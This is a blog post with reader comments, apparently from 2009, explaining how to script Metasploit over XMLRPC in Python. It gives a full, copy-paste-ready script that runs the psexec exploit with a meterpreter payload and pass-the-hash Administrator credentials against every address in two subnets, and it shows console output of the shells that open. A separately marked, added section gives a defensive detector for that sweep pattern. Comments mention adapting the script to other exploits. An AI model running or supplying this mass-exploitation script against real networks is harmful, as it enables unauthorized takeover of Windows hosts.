Python and xmlrpclib make this task easy. To start, we need to start Metasploit on our host system and load the xmlrpc plugin.
Once XMLRPC is loaded, we can get down to some Python programming.
sussurro@msfdev:~/metasploit$ ./msfconsole
=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 305 exploits - 67 auxiliary
+ -- --=[ 171 payloads - 20 encoders - 6 nops
=[ svn r7908 updated today (2009.12.17)
msf > load xmlrpc Pass=abc123 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: abc123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >
The assumption, much like with Jabra's program, is that we are going to be scanning 2 networks, the 192.168.1.X and 192.168.2.X networks. The first thing we need to do is authenticate to Metasploit.
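import xmlrpclib

user = "msf"
password = "abc123"
token = ""

# Connect to the XMLRPC service started by "load xmlrpc" above
msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")

# Log in; a successful reply carries the token used by later calls
auth = msf.auth.login(user, password)
if auth["result"] == "success":
    token = auth["token"]
else:
    exit("Login failed, try again\n")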
We set up our username, msf, and our super secret password of abc123 first, and then we use the xmlrpclib library to connect to our Metasploit server. Once we are connected, the msf object holds our connection information.
When we are connected, the first thing we need to do is authenticate so that we get an authentication token. The authentication token is required for all future actions unless your session goes idle. We authenticate with the "auth.login" method, and the object we get back contains our token.
Next we need to call our actual exploit. To do this, we create a small function to make the calls a little clearer.
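def callSploit(ip):
    # Ask Metasploit to run the psexec exploit module against one host
    ret = msf.module.execute(token, "exploit", "windows/smb/psexec",
        {
            "RHOST"   : ip,
            "PAYLOAD" : "windows/meterpreter/bind_tcp",
            "SMBUser" : "Administrator",
            "SMBPass" : "LM:NTLM HASH" })
    # "success" only means the request was valid, not that a session opened
    if ret["result"] != "success":
        print "Exploit failed for " + ip + "\n"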
We have defined a function called callSploit which takes an IP address. We are asking our Metasploit connection to launch the module.execute function, specifying our authentication token, the type of module we are calling (exploit) and the module itself that we will be using. The final argument is all of the arguments that we would traditionally pass inside the Metasploit console. Once we launch the exploit, we get back a result object, and a result of success means that the request was valid. While the requests are launching, we can see the sessions popping up in the Metasploit console and can interact with them one at a time.
The next stage in our program is to do the actual call of our new function:
for net in range(1,3):          # networks 192.168.1.X and 192.168.2.X
    for ip in range(1,254):     # hosts .1 through .253
        callSploit("192.168." + str(net) + "." + str(ip))
        time.sleep(1)
print "DONE.. check for shells"
Here we have just gone through the 192.168.1 and .2 ranges and the list of valid IP addresses for each subnet, and executed our callSploit function. The jobs will run quickly; however, if you look inside msfconsole and type "jobs" repeatedly you should see
msf > jobs
Jobs
====
Id Name
-- ----
2 Exploit: windows/smb/psexec
Finally, once you have a host that works you will hopefully see
[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)
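Seen from the network, the loop above is one source touching a new SMB target roughly every second, and each success is followed by a connection from that same source to port 4444 on the target. A detection sketch for that shape, as an added example that is not part of the original post; it is Python 3, and the flow-record format, thresholds and sample records are assumptions constructed for illustration:

```python
# Added example: flag an SMB sweep and the bind-port connections that follow it.
from collections import defaultdict

SMB_PORT, BIND_PORT = 445, 4444   # SMB; port shown in the session lines above
WINDOW = 60        # seconds (assumed threshold, tune per environment)
MIN_TARGETS = 10   # distinct SMB targets inside one window (assumed)

def parse(line):
    """Parse one 'epoch src dst dport' record (constructed flow-log format)."""
    ts, src, dst, dport = line.split()
    return int(ts), src, dst, int(dport)

def find_sweeps(lines, window=WINDOW, min_targets=MIN_TARGETS):
    """Map each sweeping source to {target: first SMB contact time}."""
    smb = defaultdict(list)
    for ts, src, dst, dport in map(parse, lines):
        if dport == SMB_PORT:
            smb[src].append((ts, dst))
    sweeps = {}
    for src, events in smb.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window until it spans at most `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            in_window = events[start:end + 1]
            if len({dst for _, dst in in_window}) >= min_targets:
                seen = sweeps.setdefault(src, {})
                for ts, dst in in_window:
                    seen.setdefault(dst, ts)
    return sweeps

def sessions_after_sweep(lines, sweeps):
    """(src, dst) pairs where a swept host later took a connection on 4444."""
    hits = set()
    for ts, src, dst, dport in map(parse, lines):
        first_smb = sweeps.get(src, {}).get(dst)
        if dport == BIND_PORT and first_smb is not None and ts >= first_smb:
            hits.add((src, dst))
    return sorted(hits)

def sample_flows():
    """Constructed data: one sweep at one host per second, plus benign traffic."""
    flows = ["%d 192.168.1.5 192.168.1.%d 445" % (1000 + i, 40 + i) for i in range(20)]
    flows.append("1006 192.168.1.5 192.168.1.44 4444")     # follows SMB to .44
    flows += ["%d 192.168.1.77 192.168.1.10 445" % (1000 + 5 * i) for i in range(20)]
    flows.append("1050 192.168.1.77 192.168.1.200 4444")   # never swept
    return flows
```

A workstation that talks to a single file server many times stays below the distinct-target threshold, so only the sweeping source and the host that accepted its follow-up connection are reported.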
To get Metasploit, go over to http://www.metasploit.com
Jabra's blog is a great read: http://spl0it.wordpress.com
Here is the script in easier copy and paste form:
#!/usr/bin/python
import xmlrpclib
import time

user = "msf"
password = "abc123"
token = ""

# Connect to the XMLRPC service and log in to obtain a token
msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user, password)
if auth["result"] == "success":
    token = auth["token"]
else:
    exit("Login failed, try again\n")

def callSploit(ip):
    # Ask Metasploit to run the psexec exploit module against one host
    ret = msf.module.execute(token, "exploit", "windows/smb/psexec",
        {
            "RHOST"   : ip,
            "PAYLOAD" : "windows/meterpreter/bind_tcp",
            "SMBUser" : "Administrator",
            "SMBPass" : "LM:NTLM HASH" })
    # "success" only means the request was valid, not that a session opened
    if ret["result"] != "success":
        print "Exploit failed for " + ip + "\n"

for net in range(1,3):          # networks 192.168.1.X and 192.168.2.X
    for ip in range(1,254):     # hosts .1 through .253
        callSploit("192.168." + str(net) + "." + str(ip))
        time.sleep(1)
print "DONE.. check for shells"
19 comments:
Nice post. I had to do some minimal modifications to test it with another exploit (ms08_67_netapi), and add the indentation that Python needs, but it worked like a charm. I'm trying to do the same thing with Perl; if I have some news on this I'll be back to let you know. Thanks for sharing ^^
Here is the Perl version of your script; it was very helpful to me: http://pastebin.com/fPkZhRNm
I'm interested in Nsploit but I cannot get the script working. Maybe I'm doing something wrong; I don't see any error in nmap...